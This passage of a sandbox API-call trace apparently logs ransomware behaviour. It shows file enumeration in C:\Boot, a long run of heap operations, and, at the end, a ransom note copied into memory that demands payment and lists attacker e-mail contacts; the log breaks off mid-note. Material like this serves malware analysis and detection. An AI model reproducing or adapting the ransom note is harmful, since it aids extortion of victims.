lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xe37fa1e0, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe37fa1e0, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x49a4880 [0127.969] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.969] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xe37fa1e0, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe37fa1e0, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0127.970] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x64c5ad69, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x385e00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="chs_boot.ttf", cAlternateFileName="")) returned 1 [0127.970] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac191e00, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac191e00, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x6505f253, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x3b27a4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cht_boot.ttf", cAlternateFileName="")) returned 1 [0127.970] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac204220, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac204220, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65274577, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x1e46e4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jpn_boot.ttf", cAlternateFileName="")) returned 1 [0127.970] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac22a380, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac22a380, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x6530caef, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x242f20, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="kor_boot.ttf", cAlternateFileName="")) returned 1 [0127.970] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac276640, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65332c4d, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xb95c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wgl4_boot.ttf", cAlternateFileName="WGL4_B~1.TTF")) returned 1 [0127.970] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe37fa1e0, ftCreationTime.dwHighDateTime=0x1d6d58a, ftLastAccessTime.dwLowDateTime=0xe37fa1e0, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe37fa1e0, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0127.970] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe37fa1e0, ftCreationTime.dwHighDateTime=0x1d6d58a, ftLastAccessTime.dwLowDateTime=0xe37fa1e0, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe37fa1e0, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0127.970] FindClose (in: hFindFile=0x49a4880 | out: hFindFile=0x49a4880) returned 1 [0127.970] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.970] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce92c8 | out: hHeap=0x4970000) returned 1 [0127.970] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce92c8 [0127.970] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0127.970] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.970] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.970] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.970] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.970] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.970] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.970] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.970] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.970] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.970] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.970] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.970] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.971] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.971] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.971] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.971] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.971] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.971] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.971] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.971] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.971] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.971] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0127.971] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.971] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.971] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.971] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.971] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc2e) returned 0x7516fe8 [0127.971] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.971] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.971] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.971] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.971] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.971] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.971] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.971] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.971] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0127.971] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.971] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.971] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.971] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0127.971] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.971] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.972] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.972] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0127.972] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.972] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.972] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.972] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.972] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.972] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.972] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.972] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.972] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.972] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.972] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.972] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0127.972] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.972] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.972] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.972] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0127.972] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.972] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.972] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.972] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.972] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.972] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.972] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.973] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.973] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.973] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.973] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.973] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.973] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.973] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.973] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.973] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.973] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.973] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.973] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.973] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.973] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.973] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.973] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.973] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.973] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.973] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.973] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.973] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.973] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.973] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.973] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.973] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.973] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0127.973] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.973] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.973] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.973] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.973] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.974] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.974] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.974] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.974] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.974] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc2e) returned 0x7516fe8 [0127.974] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.974] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.974] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.974] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.974] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0127.974] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.974] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.974] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.974] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0127.974] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.974] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.974] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.974] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.974] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.974] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.974] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.974] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.974] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.974] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.974] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.974] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.974] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0127.974] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.974] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.974] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.975] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.975] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0127.975] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.975] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.975] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.975] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0127.975] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.975] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.975] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.975] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.975] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.975] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.975] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.975] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.975] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.975] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.975] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.975] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.975] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.975] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.975] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.975] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.975] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.975] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.975] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.975] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.975] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.975] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.975] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.975] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.976] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.976] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.976] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.976] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.976] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.976] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.976] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.976] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.976] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0127.976] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.976] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.976] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.976] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.976] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.976] PathFindFileNameW (pszPath="C:\\Boot\\fr-FR\\") returned="fr-FR\\" [0127.976] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0127.976] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0127.976] PathFindFileNameW (pszPath="") returned="" [0127.976] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x7516fe8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0127.977] PathAppendW (in: pszPath="C:\\Boot\\fr-FR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\fr-FR\\_readme.txt") returned 1 [0127.977] PathFileExistsW (pszPath="C:\\Boot\\fr-FR\\_readme.txt") returned 0 [0127.978] lstrcpyW (in: lpString1=0xdd2c688, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhki" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more 